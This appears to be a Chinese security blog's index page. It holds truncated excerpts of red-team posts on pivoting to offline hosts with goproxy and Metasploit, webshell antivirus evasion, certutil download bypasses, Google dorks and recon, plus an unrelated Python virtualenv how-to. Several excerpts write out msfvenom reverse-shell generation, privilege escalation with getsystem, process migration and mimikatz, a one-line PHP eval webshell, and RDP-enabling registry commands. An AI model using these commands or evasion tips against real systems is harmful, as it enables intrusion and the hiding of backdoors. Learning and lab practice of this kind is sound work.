利用goproxy http上线不出网主机
编者荐语:对比了许多不出网上线主机的方式,这个项目的 stars 最高,利用方式最简便。无脑推荐这款。
转载自:https://mp.weixin.qq.com/s/Ue89ZO01uoztfO4jVAvmCw
我们接着上篇文章“利用MSF上线断网主机的思路分享”继续来分享一篇如何使用goproxy http代理方式上线不出网主机的利用姿势,结合上篇文章阅读更佳!!!
项目地址:https://github.com/snail007/goproxy
0x01 测试环境123攻击机(Kali):192.168.56.101受害机1(Web):192.168.56.102、192.168.186.3 - 双网卡受害机2(Data):192.168.186.4 - 断网机
0x02 goproxy http代理上线MSF/CS我们先将goproxy项目的proxy.exe工具通过中国菜刀上传至目标磁盘可读写目录中,执行以下命令在这台出网主机上开启一个8080端口的HTTP代理供后期与不出网主机进行通讯。
1C:\ProgramData\proxy.exe http -t ...
内网渗透常用命令
一、msfvenom
生成反弹shell
1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.1 lport=4444 -f exe -o re.exe
二、msfcosole
msfcosole上线,监听msfvenom生成的反弹shell
12345use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.10.1set lport 4444run
msfconsole提权
普通提权
12getuid # 查看当前用户uidgetsystem # 提权为systeem
通过迁移进程提权
1ps # 查看进程
若 PID=360, User 为 NT AUTHORITY\SYSTEM ,只要将 反弹shell 迁移到这个进程即可。
1migrate 360 # 迁移到 PID 为360的进程
加载 mimikatz
1load m ...
冰蝎webshell免杀-傻瓜版
前言先说结论,傻瓜式操作免杀,可过D盾、河马、百度、阿里、vt、https://n.shellpub.com/。
适合新手在没有基础的情况下,过av,快速连上webshell。
当然,这不是长久之计,所以所,还是要自己学习webshell免杀。
正文冰蝎的马基本都过不了 av,所以说必须是要做一下免杀才能上线。
免杀的思路有以下几个:
基于静态免杀,主要是混淆、加密。
加密的话,需要有点php基础,要会用php的魔术函数、加密函数,有点难度。
而且就算你会修改一点,大概率还是过不了百度、阿里webshell检查。
直接寻求“外援”是最好的。
解决所以直接通过第三方php加密网站来加密webshell,这个网站可以解决我们的问题:
https://enphp.djunny.com/
按部就班的上传,勾选能勾的。
结论加密网站好像每次加密的效果不一样,如果加密之后d盾警告的话,可以增删改注释…..
参考链接https://xz.aliyun.com/t/11149
https://enphp.djunny.com/
Google Dork
信息收集之Google Dork一、查找网站参数123456789101112131415161718192021221.intitle:找到网站html代码中含有指定条件的页面eg: intile:login page2.alintitle:找到网站html代码中含有特定参数的页面eg: alintile:login page3.inurl:找到网站代码中的超链接URL参数eg: inurl:login.php inurl:proftpdpasswd4.allinurl:找到网站代码中所有超链接URL参数eg: allinurl:login.php5.define: 谷歌会根据条件查找相关信息eg: define:sql syntax error6.site: 谷歌会查找指定参数的网站信息。eg: site:hackingnewstutorials.com7.link:查找有sql注入漏洞的链接。eg: link:inde.php?id=
二、查找文件参数1234567891,filetype:查找指定文件格式。eg: filetype:pdf2.intitle:直接查找网站 ...
msf及socks代理转发
转载自:https://baynk.blog.csdn.net/article/details/117375754
0x01 学习环境
拓扑如上,现在已经拥有了WIN2008的meterpreter权限
希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。
0x02 路由转发1先在meterpreter中使用route进行查看WIN2008所在的网段信息
通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。
可以看到已经有路由了,用ms17-010打win7也可以成功拿到shell
0x03 路由转发2使用post/multi/manage/autoroute模块,在msf6以前就是在meterpreter中使用run autoroute -s指令,两者是等同的。
同样的,先使用background挂到后台。这里为了实验效果,先将上一个实验的路由给删除
然后加载post/multi/manage/autoroute模块,调用session就 ...
创建 Python 虚拟环境
Python 的虚拟环境是十分有必要的
使用virtualenv创建虚拟python环境第一种安装通过命令:
优点:以后您将能够升级 virtualenv 而不会影响系统的其他部分。
1sudo apt-get install python-virtualenv
或者
1sudo pip install virtualenv
然后创建一个虚拟环境:
1virtualenv env1
进入env1
1cd env1
激活环境
1source bin/activate
你会发现在shell提示符前面多了(env1)这个提示,这就说明你已经是在虚拟环境中,在这个里面你可以安装任意的python库,而不用担心会把系统自带的python库搞乱。
12virtualenv -p /usr/bin/python3.5 myenv-p指定python版本
另外,如果存在多个python解释器,可以选择指定一个Python解释器(比如python2.7),没有指定则由系统默认的解释器来搭建。
如果不进入文件夹,则使用下面的命令激活:
1source student-env/b ...
优秀靶机推荐
VulnHubVMs Highlighted in pink are considered to be similar to OSCPKioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/Kioptrix: Level 1.1 (#2): https://www.vulnhub.com/entry/kioptrix-level-11-2,23/Kioptrix: Level 1.2 (#3): https://www.vulnhub.com/entry/kioptrix-level-12-3,24/Kioptrix: Level 1.3 (#4): https://www.vulnhub.com/entry/kioptrix-level-13-4,25Kioptrix: 2014: https://www.vulnhub.com/entry/kioptrix-2014-5,62/FristiLeaks 1.3: https://www.vulnhub.com/entry/fristilea ...
从Certutil下载绕过探究常见杀软的绕过思路
编者注:certutil 用途很广,除了下载外,还可以用来在 Windows 上 base64 木马文件,然后上传,可以有效的绕过各种 av。
转载自:https://mp.weixin.qq.com/s/MUH5Dh6pHiTvWqGCjbXpNw
0X00 前言在之前某个项目中,遇到一个只能用ms17-010-command打的Windows Server 2008 R2,每次执行输入一条命令,有些特殊符号还不能带入,这台服务器上也有开了核晶防护引擎的360安全卫士,当时简单试了一下添加管理员用户的绕过没成,看来还是得下一个exe进行多人运动。网络上找了一些下载命令变形发现都被拦了,于是本地测试了一下,项目后也顺便测试其他杀软检测效果,我们以常见的certutil为例(其他带下载功能的系统exe绕过思路都是相通的)来探究一下国内常见的杀软的绕过思路。
0X01 Certutil介绍首先简单介绍一下Windows系统自带certutil:
certutil.exe是作为证书服务的一部分安装的命令行程序。可以使用certutil.exe转储和显示证书颁发机构 (CA) 配置信息、配 ...
从零开始模拟学习红队(一)
从零开始模拟学习红队之信息收集篇0x00 前言本笔记是记录从零开始模拟红队的攻击,做到批量化、自动化、专业化。
去学习、总结如何成为一名专业的红队攻击者。
0x01 前辈的总结
来自:https://github.com/biggerduck/RedTeamNotes/blob/main/%E7%BA%A2%E9%98%9F%E5%9F%BA%E6%93%8D2-%E5%A4%96%E7%BD%91%E5%BF%AB%E9%80%9F%E6%89%93%E7%82%B9%E6%96%B9%E6%B3%95%26%E6%8A%80%E5%B7%A7%E6%80%BB%E7%BB%93.pdf
1、当项目经理告诉了你攻击目标的时候 →得到公司名→上企查查搜公司名→搜出来一堆公司和子公司2、拿到这堆公司和子公司的名字→oneforall来跑一遍→然后得到了一堆子域名3、拿到这堆子域名丢给Eeyes跑一遍→得到对应子域名对应的ip和c段信息4、将对应ip和c段丢给fofa和fscan→fofa能快速得到c段资产信息,fscan能快速扫一遍,顺便帮你打一下常用漏洞5、如果你的运气足够好,这个时 ...
个人知识库备忘录
前言备忘录分为:技巧、命令、工具,三大类别。
旨在记录常用、好用的知识,便于快速翻阅查找,节省时间。
技巧篇1.webshell 上传(1)Windows 命令行写入 shell
1echo ^<?php @eval($_POST[1]);?^>> ./WWW/shell.php
操作系统篇1. Windows(1)查看并杀死某个进程
12345tasklisttskill pidtaskkill /f /im notepad.exe /ttaskkill /f /pid 1234 /t
(2) 查看本机网络连接情况
12345netstat -ano|findstr 本机ip-a 查看开启了哪些端口-n 查看端口的网络连接情况-o 查看端口的进程,方便杀死
(3) RDP
123456789101112#开启 RDPREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 000000 ...